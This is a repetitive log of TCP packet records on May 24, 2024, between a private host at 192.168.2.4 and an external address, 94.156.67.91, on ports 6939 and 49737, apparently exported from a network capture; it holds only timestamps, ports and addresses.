May 24, 2024 05:09:49.711477041 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.711487055 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.711525917 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.735023975 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.735198975 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.735208035 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.735568047 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.735892057 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.735994101 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.736004114 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.736056089 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.736684084 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.736701965 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.736752033 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.740322113 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.743205070 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.743438005 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.743614912 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.743679047 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.743732929 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.743999004 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.744009018 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.744016886 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.744025946 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.744050980 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.744086981 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.744843006 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.745189905 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.745199919 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.745208025 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.745244026 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.745275974 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.746081114 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.746090889 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.746099949 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.746109009 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.746143103 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.746175051 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.746953964 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.746963978 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.747025013 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.747561932 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.747570992 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.747580051 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.747629881 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.748476982 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.748486042 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.748493910 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.748507023 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.748532057 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.748564005 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.749357939 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.749367952 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.749376059 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.749385118 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.749408960 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.749443054 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.750238895 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.750248909 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.750257969 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.750267029 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.750289917 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.750320911 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.751147985 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.751157045 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.751166105 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.751174927 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.751203060 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.751236916 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.752624035 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.752691031 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.752744913 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.753068924 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.753077984 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.753114939 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.753351927 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.753431082 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.753693104 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.753703117 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.753710985 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.753742933 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.754843950 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.754853010 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.754899979 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.754966974 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.755016088 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.755315065 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.755325079 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.755333900 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.755373001 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.755929947 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.755939960 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.755980015 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.756294966 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.756345034 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.759656906 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.759749889 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.759824991 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.759967089 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.759977102 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.760121107 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.760227919 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.760237932 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.760246038 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.760281086 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.764256954 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.764266968 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.764323950 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.764363050 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.764563084 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.764596939 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.764609098 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.764650106 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.765019894 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.765083075 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.765140057 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.769265890 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.769362926 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.769371986 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.769423962 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.769612074 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.769764900 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.769844055 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.769854069 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.769906998 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.770246029 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.770472050 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.770495892 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.770524979 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.778044939 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.778117895 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.778151989 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.778460979 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.778614044 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.778768063 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.778779030 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.778786898 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.778795004 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.778819084 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.778848886 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.782183886 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.782330990 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.782341957 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.782385111 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.782607079 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.782769918 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.782932043 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.782941103 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.782948971 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.782998085 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.783721924 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.783772945 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.789928913 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.790127993 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.790178061 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.790337086 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.790594101 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.790780067 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.790910006 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.790920019 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.790966988 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.793493032 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.793503046 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.793540955 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.793724060 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.793734074 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.793864965 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.793874025 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.794167995 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.794213057 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.794425011 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.794435024 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.794472933 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.795011997 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.797059059 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.797106981 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.797147989 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.797378063 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.797419071 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.797620058 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.797629118 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.797637939 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.797667027 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.798063040 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.798106909 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.799765110 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.824140072 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.824281931 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.824284077 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.824556112 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.824687958 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.824870110 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.824879885 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.824888945 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.825031996 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.829066992 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.829076052 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.829125881 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.832182884 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.832290888 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.832294941 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.832520008 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.832590103 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.832735062 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.832988977 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.832997084 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.833004951 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.833014011 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.833044052 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.833077908 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.833622932 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.833672047 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.833887100 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.833894968 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.833904028 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.833913088 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.833921909 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.833936930 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.833969116 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.834736109 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.834784985 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.835004091 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.835012913 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.835021019 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.835030079 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.835068941 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.835069895 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.835903883 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.835915089 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.835923910 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.835933924 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.835942984 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.835962057 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.835963011 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.836745977 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.836755991 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.836796999 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.837223053 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.837232113 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.837235928 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.837240934 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.837244987 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.837296009 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.838076115 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.838085890 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.838131905 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.838520050 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.838530064 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.838567972 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.841747046 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.841862917 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.842072964 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.842072010 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.842303991 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.842480898 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.842550039 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.843305111 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.843314886 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.843380928 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.843851089 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.843947887 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.844022989 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.844158888 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.844168901 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.844178915 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.844213009 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.844248056 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.848057032 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.848067045 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.848124027 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.848740101 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.848885059 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.849045992 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.849132061 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.849143028 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.849150896 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.849190950 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.852842093 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.852852106 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.852896929 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.853256941 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.853339911 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.853415012 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.853504896 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.853554010 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.853699923 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.853709936 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.853799105 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.853903055 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.853912115 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.853959084 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.857578993 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.858258009 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.858323097 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.858355045 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.858524084 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.858532906 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.858709097 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.858884096 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.858933926 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.862323046 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.862333059 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.862379074 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.867258072 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.867269039 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.867458105 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.867500067 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.867759943 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.867769003 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.867777109 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.867785931 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.867918015 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.867918015 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.871161938 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.871304989 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.871314049 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.871462107 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.871462107 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.871488094 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.871741056 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.871751070 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.871759892 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.871912003 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.871912003 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.872370958 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.872380018 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.872430086 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.878982067 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.879167080 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.879230976 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.879312038 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.879551888 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.879561901 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.879570007 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.879578114 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.879709959 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.882426023 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.882481098 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.882632017 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.882642031 CEST	6939	49737	94.156.67.91	192.168.2.4
